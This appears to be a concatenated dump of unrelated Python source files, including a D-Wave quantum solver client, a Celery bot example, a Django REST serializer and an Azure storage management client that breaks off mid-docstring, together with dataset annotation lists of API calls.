(1, 0)
(1, 0)
(0, 1)
(1, 0)
"""
linear, quadratic = reformat_qubo_as_ising(qubo)
return self._sample('qubo', linear, quadratic, params)
def sample_bqm(self, bqm, **params):
"""Sample from the specified :term:`BQM`.
Args:
bqm (:class:`~dimod.BinaryQuadraticModel`):
A binary quadratic model.
**params:
Parameters for the sampling method, solver-specific.
Returns:
:class:`Future`
Note:
To use this method, dimod package has to be installed.
"""
try:
import dimod
except ImportError: # pragma: no cover
raise RuntimeError("Can't sample from 'bqm' without dimod. "
"Re-install the library with 'bqm' support.")
ising = bqm.spin
return self.sample_ising(ising.linear, ising.quadratic, **params)
def _sample(self, type_, linear, quadratic, params):
"""Internal method for `sample_ising` and `sample_qubo`.
Args:
linear (list/dict):
Linear terms of the model.
quadratic (dict[(int, int), float]):
Quadratic terms of the model.
**params:
Parameters for the sampling method, solver-specific.
Returns:
:class:`Future`
"""
# Check the problem
if not self.check_problem(linear, quadratic):
raise InvalidProblemError("Problem graph incompatible with solver.")
# Mix the new parameters with the default parameters
combined_params = dict(self._params)
combined_params.update(params)
# Check the parameters before submitting
for key in combined_params:
if key not in self.parameters and not key.startswith('x_'):
raise KeyError("{} is not a parameter of this solver.".format(key))
# transform some of the parameters in-place
self._format_params(type_, combined_params)
body = json.dumps({
'solver': self.id,
'data': encode_problem_as_qp(self, linear, quadratic),
'type': type_,
'params': combined_params
})
logger.trace("Encoded sample request: %s", body)
future = Future(solver=self, id_=None, return_matrix=self.return_matrix)
logger.debug("Submitting new problem to: %s", self.id)
self.client._submit(body, future)
return future
def _format_params(self, type_, params):
"""Reformat some of the parameters for sapi."""
if 'initial_state' in params:
# NB: at this moment the error raised when initial_state does not match lin/quad (in
# active qubits) is not very informative, but there is also no clean way to check here
# that they match because lin can be either a list or a dict. In the future it would be
# good to check.
initial_state = params['initial_state']
if isinstance(initial_state, Mapping):
initial_state_list = [3]*self.properties['num_qubits']
low = -1 if type_ == 'ising' else 0
for v, val in initial_state.items():
if val == 3:
continue
if val <= 0:
initial_state_list[v] = low
else:
initial_state_list[v] = 1
params['initial_state'] = initial_state_list
# else: support old format
def check_problem(self, linear, quadratic):
"""Test if an Ising model matches the graph provided by the solver.
Args:
linear (list/dict):
Linear terms of the model (h).
quadratic (dict[(int, int), float]):
Quadratic terms of the model (J).
Returns:
boolean
Examples:
This example creates a client using the local system's default D-Wave Cloud Client
configuration file, which is configured to access a D-Wave 2000Q QPU, and
tests a simple :term:`Ising` model for two target embeddings (that is, representations
of the model's graph by coupled qubits on the QPU's sparsely connected graph),
where only the second is valid.
>>> from dwave.cloud import Client
>>> print((0, 1) in solver.edges) # doctest: +SKIP
False
>>> print((0, 4) in solver.edges) # doctest: +SKIP
True
>>> with Client.from_config() as client: # doctest: +SKIP
... solver = client.get_solver()
... print(solver.check_problem({0: -1, 1: 1},{(0, 1):0.5}))
... print(solver.check_problem({0: -1, 4: 1},{(0, 4):0.5}))
...
False
True
"""
for key, value in uniform_iterator(linear):
if value != 0 and key not in self.nodes:
return False
for key, value in uniform_iterator(quadratic):
if value != 0 and tuple(key) not in self.edges:
return False
return True
# for backwards compatibility:
Solver = StructuredSolver
# list of all available solvers, ordered according to loading attempt priority
# (more specific first)
available_solvers = [StructuredSolver, UnstructuredSolver] | [
"logging.getLogger",
"dwave.cloud.coders.decode_qp_numpy",
"dwave.cloud.coders.decode_bq",
"dwave.cloud.coders.encode_problem_as_bq",
"dwave.cloud.utils.reformat_qubo_as_ising",
"dwave.cloud.utils.uniform_iterator",
"dwave.cloud.coders.decode_qp",
"dwave.cloud.coders.encode_problem_as_qp",
"dimod.Bi... | [((1678, 1705), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1695, 1705), False, 'import logging\n'), ((5113, 5150), 'dwave.cloud.computation.Future', 'Future', (['self', 'id_', 'self.return_matrix'], {}), '(self, id_, self.return_matrix)\n', (5119, 5150), False, 'from dwave.cloud.computation import Future\n'), ((7190, 7281), 'warnings.warn', 'warnings.warn', (['"""\'is_qpu\' property is deprecated in favor of \'qpu\'."""', 'DeprecationWarning'], {}), '("\'is_qpu\' property is deprecated in favor of \'qpu\'.",\n DeprecationWarning)\n', (7203, 7281), False, 'import warnings\n'), ((7352, 7453), 'warnings.warn', 'warnings.warn', (['"""\'is_software\' property is deprecated in favor of \'software\'."""', 'DeprecationWarning'], {}), '("\'is_software\' property is deprecated in favor of \'software\'.",\n DeprecationWarning)\n', (7365, 7453), False, 'import warnings\n'), ((7527, 7624), 'warnings.warn', 'warnings.warn', (['"""\'is_online\' property is deprecated in favor of \'online\'."""', 'DeprecationWarning'], {}), '("\'is_online\' property is deprecated in favor of \'online\'.",\n DeprecationWarning)\n', (7540, 7624), False, 'import warnings\n'), ((8901, 8957), 'dimod.BinaryQuadraticModel.from_ising', 'dimod.BinaryQuadraticModel.from_ising', (['linear', 'quadratic'], {}), '(linear, quadratic)\n', (8938, 8957), False, 'import dimod\n'), ((9755, 9797), 'dimod.BinaryQuadraticModel.from_qubo', 'dimod.BinaryQuadraticModel.from_qubo', (['qubo'], {}), '(qubo)\n', (9791, 9797), False, 'import dimod\n'), ((10672, 10735), 'dwave.cloud.computation.Future', 'Future', ([], {'solver': 'self', 'id_': 'None', 'return_matrix': 'self.return_matrix'}), '(solver=self, id_=None, return_matrix=self.return_matrix)\n', (10678, 10735), False, 'from dwave.cloud.computation import Future\n'), ((19461, 19489), 'dwave.cloud.utils.reformat_qubo_as_ising', 'reformat_qubo_as_ising', (['qubo'], {}), '(qubo)\n', (19483, 19489), False, 'from dwave.cloud.utils import uniform_iterator, reformat_qubo_as_ising\n'), ((21718, 21781), 'dwave.cloud.computation.Future', 'Future', ([], {'solver': 'self', 'id_': 'None', 'return_matrix': 'self.return_matrix'}), '(solver=self, id_=None, return_matrix=self.return_matrix)\n', (21724, 21781), False, 'from dwave.cloud.computation import Future\n'), ((24350, 24374), 'dwave.cloud.utils.uniform_iterator', 'uniform_iterator', (['linear'], {}), '(linear)\n', (24366, 24374), False, 'from dwave.cloud.utils import uniform_iterator, reformat_qubo_as_ising\n'), ((24484, 24511), 'dwave.cloud.utils.uniform_iterator', 'uniform_iterator', (['quadratic'], {}), '(quadratic)\n', (24500, 24511), False, 'from dwave.cloud.utils import uniform_iterator, reformat_qubo_as_ising\n'), ((5344, 5398), 'dwave.cloud.coders.decode_qp_numpy', 'decode_qp_numpy', (['msg'], {'return_matrix': 'self.return_matrix'}), '(msg, return_matrix=self.return_matrix)\n', (5359, 5398), False, 'from dwave.cloud.coders import encode_problem_as_qp, encode_problem_as_bq, decode_qp_numpy, decode_qp, decode_bq\n'), ((5432, 5446), 'dwave.cloud.coders.decode_qp', 'decode_qp', (['msg'], {}), '(msg)\n', (5441, 5446), False, 'from dwave.cloud.coders import encode_problem_as_qp, encode_problem_as_bq, decode_qp_numpy, decode_qp, decode_bq\n'), ((5896, 5910), 'dwave.cloud.coders.decode_bq', 'decode_bq', (['msg'], {}), '(msg)\n', (5905, 5910), False, 'from dwave.cloud.coders import encode_problem_as_qp, encode_problem_as_bq, decode_qp_numpy, decode_qp, decode_bq\n'), ((10503, 10528), 'dwave.cloud.coders.encode_problem_as_bq', 'encode_problem_as_bq', (['bqm'], {}), '(bqm)\n', (10523, 10528), False, 'from dwave.cloud.coders import encode_problem_as_qp, encode_problem_as_bq, decode_qp_numpy, decode_qp, decode_bq\n'), ((11760, 11800), 'dwave.cloud.coders.encode_problem_as_bq', 'encode_problem_as_bq', (['bqm'], {'compress': '(True)'}), '(bqm, compress=True)\n', (11780, 11800), False, 'from dwave.cloud.coders import encode_problem_as_qp, encode_problem_as_bq, decode_qp_numpy, decode_qp, decode_bq\n'), ((21520, 21565), 'dwave.cloud.coders.encode_problem_as_qp', 'encode_problem_as_qp', (['self', 'linear', 'quadratic'], {}), '(self, linear, quadratic)\n', (21540, 21565), False, 'from dwave.cloud.coders import encode_problem_as_qp, encode_problem_as_bq, decode_qp_numpy, decode_qp, decode_bq\n')] |
import pytest
from unittest.mock import patch
import tests.fixtures.journal as FakeJournalExporter
from systemdlogger.elasticsearch import ElasticsearchLogger
@pytest.mark.parametrize(('config_path'), [
'tests/fixtures/config_es.json'
])
class TestRunner:
def setup_method(self, method):
""" setup any state tied to the execution of the given method in a
class. setup_method is invoked for every test method of a class.
"""
modules = {
'systemdlogger.journal': FakeJournalExporter
}
self.module_patcher = patch.dict('sys.modules', modules)
self.module_patcher.start()
from systemdlogger.runner import Runner
self.Runner = Runner
def teardown_method(self, method):
""" teardown any state that was previously setup with a setup_method
call.
"""
self.module_patcher.stop()
def test_init(self, config_path):
runner = self.Runner(config_path)
assert len(runner.loggers) == 1
assert isinstance(runner.loggers[0], ElasticsearchLogger)
def test_run(self, config_path):
runner = self.Runner(config_path)
runner.run()
| [
"pytest.mark.parametrize",
"unittest.mock.patch.dict"
] | [((162, 235), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""config_path"""', "['tests/fixtures/config_es.json']"], {}), "('config_path', ['tests/fixtures/config_es.json'])\n", (185, 235), False, 'import pytest\n'), ((578, 612), 'unittest.mock.patch.dict', 'patch.dict', (['"""sys.modules"""', 'modules'], {}), "('sys.modules', modules)\n", (588, 612), False, 'from unittest.mock import patch\n')] |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2019 CERN.
#
# invenio-app-ils is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Loan indexer APIs."""
from datetime import datetime
from celery import shared_task
from flask import current_app
from invenio_circulation.pidstore.pids import CIRCULATION_LOAN_PID_TYPE
from invenio_circulation.proxies import current_circulation
from invenio_indexer.api import RecordIndexer
from invenio_pidstore.errors import PIDDeletedError
from invenio_app_ils.circulation.utils import resolve_item_from_loan
from invenio_app_ils.documents.api import DOCUMENT_PID_TYPE
from invenio_app_ils.indexer import ReferencedRecordsIndexer
from invenio_app_ils.proxies import current_app_ils
@shared_task(ignore_result=True)
def index_referenced_records(loan):
"""Index referenced records."""
indexer = ReferencedRecordsIndexer()
indexed = dict(pid_type=CIRCULATION_LOAN_PID_TYPE, record=loan)
referenced = []
# fetch and index the document
document_cls = current_app_ils.document_record_cls
document = document_cls.get_record_by_pid(loan["document_pid"])
referenced.append(dict(pid_type=DOCUMENT_PID_TYPE, record=document))
# fetch and index the item
if loan.get("item_pid"):
item = resolve_item_from_loan(loan["item_pid"])
referenced.append(dict(pid_type=loan["item_pid"]["type"], record=item))
# index the loan itself: this is needed because of the extra field
# `available_items_for_loan_count` added when indexing.
# To calculate the value of this field, a search on the `loans`
# indexed is performed and this loan has to be already indexed
# with its latest data.
# At the first indexing, `available_items_for_loan_count` value might
# be wrong and corrected at the second re-indexing.
loan_class = current_circulation.loan_record_cls
loan_record = loan_class.get_record_by_pid(loan["pid"])
referenced.append(
dict(pid_type=CIRCULATION_LOAN_PID_TYPE, record=loan_record)
)
# add all the other loans, as after indexing this one, they
# will be affected in search
pending_loans = \
document.search_loan_references().scan()
for loan_hit in pending_loans:
pending_loan = loan_class.get_record_by_pid(loan_hit.pid)
referenced.append(
dict(pid_type=CIRCULATION_LOAN_PID_TYPE, record=pending_loan)
)
# index the loan and referenced records
indexer.index(indexed, referenced)
class LoanIndexer(RecordIndexer):
"""Indexer class for Loan record."""
def index(self, loan, arguments=None, **kwargs):
"""Index an Loan."""
super().index(loan)
eta = datetime.utcnow() + current_app.config["ILS_INDEXER_TASK_DELAY"]
index_referenced_records.apply_async((loan,), eta=eta)
def index_extra_fields_for_loan(loan_dict):
"""Indexer hook to modify the loan record dict before indexing.
The `available_items_for_loan_count` and `can_circulate_items_count` fields
are added to the loan only on the search index because they are needed for
search aggregation/filtering. They are not needed when fetching the loan
details.
"""
document_class = current_app_ils.document_record_cls
try:
document_record = document_class.get_record_by_pid(
loan_dict["document_pid"]
)
except PIDDeletedError:
# Document might have been deleted while reindexing asynchronously.
return
document = document_record.replace_refs()
items_available_for_loan_count = document["circulation"][
"available_items_for_loan_count"
]
loan_dict[
"available_items_for_loan_count"
] = items_available_for_loan_count
can_circulate_items_count = document["circulation"][
"can_circulate_items_count"
]
loan_dict["can_circulate_items_count"] = can_circulate_items_count
| [
"invenio_app_ils.indexer.ReferencedRecordsIndexer",
"celery.shared_task",
"invenio_app_ils.circulation.utils.resolve_item_from_loan",
"datetime.datetime.utcnow"
] | [((800, 831), 'celery.shared_task', 'shared_task', ([], {'ignore_result': '(True)'}), '(ignore_result=True)\n', (811, 831), False, 'from celery import shared_task\n'), ((918, 944), 'invenio_app_ils.indexer.ReferencedRecordsIndexer', 'ReferencedRecordsIndexer', ([], {}), '()\n', (942, 944), False, 'from invenio_app_ils.indexer import ReferencedRecordsIndexer\n'), ((1341, 1381), 'invenio_app_ils.circulation.utils.resolve_item_from_loan', 'resolve_item_from_loan', (["loan['item_pid']"], {}), "(loan['item_pid'])\n", (1363, 1381), False, 'from invenio_app_ils.circulation.utils import resolve_item_from_loan\n'), ((2767, 2784), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (2782, 2784), False, 'from datetime import datetime\n')] |
""" bot example
Minimal bot implementation to serve as an example.
Not really a part of the Canvas Indexer code base.
"""
import json
import random
import requests
import time
from celery import Celery
from flask import (abort, Flask, request, Response)
from flask_cors import CORS
def get_tags(img_url):
return ['foo', 'bar']
def make_celery(app):
celery = Celery(
'bot_example',
backend=app.config['CELERY_RESULT_BACKEND'],
broker=app.config['CELERY_BROKER_URL']
)
celery.conf.update(app.config)
class ContextTask(celery.Task):
def __call__(self, *args, **kwargs):
with app.app_context():
return self.run(*args, **kwargs)
celery.Task = ContextTask
return celery
app = Flask(__name__)
app.config.update(
CELERY_BROKER_URL='redis://localhost:6379',
CELERY_RESULT_BACKEND='redis://localhost:6379'
)
celery = make_celery(app)
CORS(app)
random.seed()
@app.route('/job', methods=['POST'])
def job():
""" Receive a job.
"""
json_bytes = request.data
try:
json_string = json_bytes.decode('utf-8')
job_obj = json.loads(json_string)
except:
return abort(400, 'No valid JSON provided.')
if type(job_obj) != dict or \
'imgs' not in job_obj or \
'callback_url' not in job_obj:
return abort(400, 'No valid job list provided.')
job_id = random.randint(1, 999999)
# call callback task asynchronously
result = callback.delay(job_obj, job_id)
resp = Response(json.dumps({'job_id': job_id}))
return resp
@celery.task()
def callback(job_obj, job_id):
time.sleep(1) # TODO: remove
results = []
for img in job_obj['imgs']:
result = {}
tags = get_tags(img['img_url'])
result['tags'] = tags
result['canvas_uri'] = img['canvas_uri']
result['manifest_uri'] = img['manifest_uri']
results.append(result)
ret = {}
ret['job_id'] = job_id
ret['results'] = results
print('sending callback request for job #{}'.format(job_id))
resp = requests.post(job_obj['callback_url'],
headers={'Accept': 'application/json',
'Content-Type': 'application/json'},
data=json.dumps(ret),
timeout=60)
print(resp.status_code)
if __name__ == '__main__':
app.run(host='0.0.0.0')
| [
"json.loads",
"flask_cors.CORS",
"flask.Flask",
"celery.Celery",
"json.dumps",
"random.seed",
"time.sleep",
"flask.abort",
"random.randint"
] | [((776, 791), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (781, 791), False, 'from flask import abort, Flask, request, Response\n'), ((938, 947), 'flask_cors.CORS', 'CORS', (['app'], {}), '(app)\n', (942, 947), False, 'from flask_cors import CORS\n'), ((948, 961), 'random.seed', 'random.seed', ([], {}), '()\n', (959, 961), False, 'import random\n'), ((380, 491), 'celery.Celery', 'Celery', (['"""bot_example"""'], {'backend': "app.config['CELERY_RESULT_BACKEND']", 'broker': "app.config['CELERY_BROKER_URL']"}), "('bot_example', backend=app.config['CELERY_RESULT_BACKEND'], broker=\n app.config['CELERY_BROKER_URL'])\n", (386, 491), False, 'from celery import Celery\n'), ((1426, 1451), 'random.randint', 'random.randint', (['(1)', '(999999)'], {}), '(1, 999999)\n', (1440, 1451), False, 'import random\n'), ((1659, 1672), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (1669, 1672), False, 'import time\n'), ((1150, 1173), 'json.loads', 'json.loads', (['json_string'], {}), '(json_string)\n', (1160, 1173), False, 'import json\n'), ((1370, 1411), 'flask.abort', 'abort', (['(400)', '"""No valid job list provided."""'], {}), "(400, 'No valid job list provided.')\n", (1375, 1411), False, 'from flask import abort, Flask, request, Response\n'), ((1559, 1589), 'json.dumps', 'json.dumps', (["{'job_id': job_id}"], {}), "({'job_id': job_id})\n", (1569, 1589), False, 'import json\n'), ((1201, 1238), 'flask.abort', 'abort', (['(400)', '"""No valid JSON provided."""'], {}), "(400, 'No valid JSON provided.')\n", (1206, 1238), False, 'from flask import abort, Flask, request, Response\n'), ((2312, 2327), 'json.dumps', 'json.dumps', (['ret'], {}), '(ret)\n', (2322, 2327), False, 'import json\n')] |
# -*- coding:utf-8 -*-
import hashlib
import hmac
import time
def create_auth_headers(url, access_key, secret, body=None):
"""
get HTTP headers for API authentication
:param url: API url. (e.g. https://coincheck.com/api/accounts/balance )
:param access_key: Access Key string for API authentication
:param secret: Secret Access Key string for API authentication
:return: HTTP header dictionary
"""
current_millis = str(int(round(time.time() * 1000)))
message = current_millis + url + body
signature = hmac.new(secret.encode("utf-8"), message.encode("utf-8"), hashlib.sha256).hexdigest()
headers = {
"ACCESS-KEY": access_key,
"ACCESS-NONCE": current_millis,
"ACCESS-SIGNATURE": signature
}
return headers
| [
"time.time"
] | [((463, 474), 'time.time', 'time.time', ([], {}), '()\n', (472, 474), False, 'import time\n')] |
from datetime import datetime
from django.utils.timesince import timesince
from rest_framework import serializers
from news.models import Journalist, Article
class ArticleSerializer(serializers.ModelSerializer):
time_since_publication = serializers.SerializerMethodField()
# author = JournalistSerializer(read_only=True)
class Meta:
model = Article
exclude = ('id',)
def get_time_since_publication(self, object):
publication_date = object.publication_date
now = datetime.now()
time_delta = timesince(publication_date, now)
return time_delta
def validate(self, data):
""" Check that description and title are different """
if data['title'] == data['description']:
raise serializers.ValidationError('Title and Description must be different')
return data
def validate_title(self, value):
if len(value) < 50:
raise serializers.ValidationError('Title has to be at least 50 characters long')
return value
class JournalistSerializer(serializers.ModelSerializer):
articles = serializers.HyperlinkedRelatedField(many=True, read_only=True, view_name='article-detail')
# articles = ArticleSerializer(many=True, read_only=True)
class Meta:
model = Journalist
exclude = ('id', )
# class ArticleSerializer(serializers.Serializer):
# id = serializers.IntegerField(read_only=True)
# author = serializers.CharField()
# title = serializers.CharField()
# description = serializers.CharField()
# body = serializers.CharField()
# location = serializers.CharField()
# publication_date = serializers.DateField()
# active = serializers.BooleanField()
# created_at = serializers.DateTimeField(read_only=True)
# updated_at = serializers.DateTimeField(read_only=True)
#
# def create(self, validated_data):
# return Article.objects.create(**validated_data)
#
# def update(self, instance, validated_data):
# instance.author = validated_data.get('author', instance.author)
# instance.title = validated_data.get('title', instance.title)
# instance.description = validated_data.get('description', instance.description)
# instance.body = validated_data.get('body', instance.body)
# instance.location = validated_data.get('location', instance.location)
# instance.publication_date = validated_data.get('publication_date', instance.publication_date)
# instance.active = validated_data.get('active', instance.active)
# instance.save()
# return instance
#
# def validate(self, data):
# """ Check that description and title are different """
# if data['title'] == data['description']:
# raise serializers.ValidationError('Title and Description must be different')
# return data
#
# def validate_title(self, value):
# if len(value) < 50:
# raise serializers.ValidationError('Title has to be at least 50 characters long')
# return value
| [
"rest_framework.serializers.SerializerMethodField",
"rest_framework.serializers.ValidationError",
"datetime.datetime.now",
"rest_framework.serializers.HyperlinkedRelatedField",
"django.utils.timesince.timesince"
] | [((244, 279), 'rest_framework.serializers.SerializerMethodField', 'serializers.SerializerMethodField', ([], {}), '()\n', (277, 279), False, 'from rest_framework import serializers\n'), ((1116, 1211), 'rest_framework.serializers.HyperlinkedRelatedField', 'serializers.HyperlinkedRelatedField', ([], {'many': '(True)', 'read_only': '(True)', 'view_name': '"""article-detail"""'}), "(many=True, read_only=True, view_name=\n 'article-detail')\n", (1151, 1211), False, 'from rest_framework import serializers\n'), ((515, 529), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (527, 529), False, 'from datetime import datetime\n'), ((551, 583), 'django.utils.timesince.timesince', 'timesince', (['publication_date', 'now'], {}), '(publication_date, now)\n', (560, 583), False, 'from django.utils.timesince import timesince\n'), ((771, 841), 'rest_framework.serializers.ValidationError', 'serializers.ValidationError', (['"""Title and Description must be different"""'], {}), "('Title and Description must be different')\n", (798, 841), False, 'from rest_framework import serializers\n'), ((946, 1020), 'rest_framework.serializers.ValidationError', 'serializers.ValidationError', (['"""Title has to be at least 50 characters long"""'], {}), "('Title has to be at least 50 characters long')\n", (973, 1020), False, 'from rest_framework import serializers\n')] |
from math import hypot
class Vector():
def __init__(self, x=0, y=0):
self.x = x
self.y = y
def __repr__(self):
return 'Vector(%r, %r)' % (self.x, self.y)
def __abs__(self):
return hypot(self.x, self.y)
def __bool__(self):
return bool(abs(self))
def __add__(self, other):
return Vector(self.x+other.x, self.y+other.y)
def __mul__(self, scalar):
return Vector(self.x*scalar, self.y*scalar) | [
"math.hypot"
] | [((228, 249), 'math.hypot', 'hypot', (['self.x', 'self.y'], {}), '(self.x, self.y)\n', (233, 249), False, 'from math import hypot\n')] |
import itertools
from task_selector.task import Task
class TaskSelector:
"""Selector for finding best Task combination """
def __init__(self, tasks: list[Task] = None):
if tasks is None:
tasks = []
self.tasks = tasks
self.selected = []
self.selected_profit = 0.0
def set_tasks(self, tasks: list[Task]):
self.tasks = tasks
def select(self):
"""Compare all possible Task combinations to find the maximum profit
without sharing the same resources between selected Tasks"""
self.selected = []
self.selected_profit = 0
# If zero tasks, return
if len(self.tasks) == 0:
return self.selected
# Create all possible combinations, starting from length == 1 and
# following with greater ones up to full tasks list.
for i in range(1, len(self.tasks)+1):
for combination in itertools.combinations(self.tasks, i):
comb_select = TaskSelector(combination)
# If valid combination, store it and its profit for comparison
if comb_select.is_valid():
comb_profit = comb_select.get_profit()
if comb_profit > self.selected_profit:
self.selected_profit = comb_profit
self.selected = list(combination)
return self.selected
def is_valid(self) -> bool:
# Create a Set to speed lookup of added resources
resource_set = set()
for task in self.tasks:
for resource in task.resources:
if resource not in resource_set:
resource_set.add(resource)
# Exit if repeated resource found
else:
return False
return True
def get_profit(self) -> float:
return sum(t.profit for t in self.tasks) | [
"itertools.combinations"
] | [((931, 968), 'itertools.combinations', 'itertools.combinations', (['self.tasks', 'i'], {}), '(self.tasks, i)\n', (953, 968), False, 'import itertools\n')] |
# -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
def rescale(data, to=[0, 1]):
"""Rescale data.
Rescale a numeric variable to a new range.
Parameters
----------
data : list, array or Series
Raw data.
to : list
New range of values of the data after rescaling.
Returns
----------
list, array or Series
The rescaled values.
Examples
----------
>>> import neurokit2 as nk
>>>
>>> nk.rescale(data=[3, 1, 2, 4, 6], to=[0, 1])
"""
# Return appropriate type
if isinstance(data, list):
data = list(_rescale(np.array(data), to=to))
else:
data = _rescale(data, to=to)
return data
def _rescale(data, to=[0, 1]):
y = (to[1] - to[0]) / (np.nanmax(data) - np.nanmin(data)) * (data - np.nanmin(data)) + to[0]
return y
| [
"numpy.nanmin",
"numpy.array",
"numpy.nanmax"
] | [((623, 637), 'numpy.array', 'np.array', (['data'], {}), '(data)\n', (631, 637), True, 'import numpy as np\n'), ((821, 836), 'numpy.nanmin', 'np.nanmin', (['data'], {}), '(data)\n', (830, 836), True, 'import numpy as np\n'), ((776, 791), 'numpy.nanmax', 'np.nanmax', (['data'], {}), '(data)\n', (785, 791), True, 'import numpy as np\n'), ((794, 809), 'numpy.nanmin', 'np.nanmin', (['data'], {}), '(data)\n', (803, 809), True, 'import numpy as np\n')] |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
import uuid
from .. import models
class StorageAccountsOperations(object):
"""StorageAccountsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def check_name_availability(
self, account_name, custom_headers=None, raw=False, **operation_config):
"""Checks that account name is valid and is not in use.
:param account_name: The name of the storage account within the
specified resource group. Storage account names must be between 3
and 24 characters in length and use numbers and lower-case letters
only.
:type account_name:
:class:`StorageAccountCheckNameAvailabilityParameters
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccountCheckNameAvailabilityParameters>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`CheckNameAvailabilityResult
<Fixtures.AcceptanceTestsStorageManagementClient.models.CheckNameAvailabilityResult>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Storage/checkNameAvailability'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(account_name, 'StorageAccountCheckNameAvailabilityParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CheckNameAvailabilityResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create(
self, resource_group_name, account_name, parameters, custom_headers=None, raw=False, **operation_config):
"""Asynchronously creates a new storage account with the specified
parameters. Existing accounts cannot be updated with this API and
should instead use the Update Storage Account API. If an account is
already created and subsequent PUT request is issued with exact same
set of properties, then HTTP 200 would be returned. .
:param resource_group_name: The name of the resource group within the
user’s subscription.
:type resource_group_name: str
:param account_name: The name of the storage account within the
specified resource group. Storage account names must be between 3
and 24 characters in length and use numbers and lower-case letters
only.
:type account_name: str
:param parameters: The parameters to provide for the created account.
:type parameters: :class:`StorageAccountCreateParameters
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccountCreateParameters>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`StorageAccount
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccount>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'StorageAccountCreateParameters')
# Construct and send request
def long_running_send():
request = self._client.put(url, query_parameters)
return self._client.send(
request, header_parameters, body_content, **operation_config)
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
return self._client.send(
request, header_parameters, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('StorageAccount', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def delete(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Deletes a storage account in Microsoft Azure.
:param resource_group_name: The name of the resource group within the
user’s subscription.
:type resource_group_name: str
:param account_name: The name of the storage account within the
specified resource group. Storage account names must be between 3
and 24 characters in length and use numbers and lower-case letters
only.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
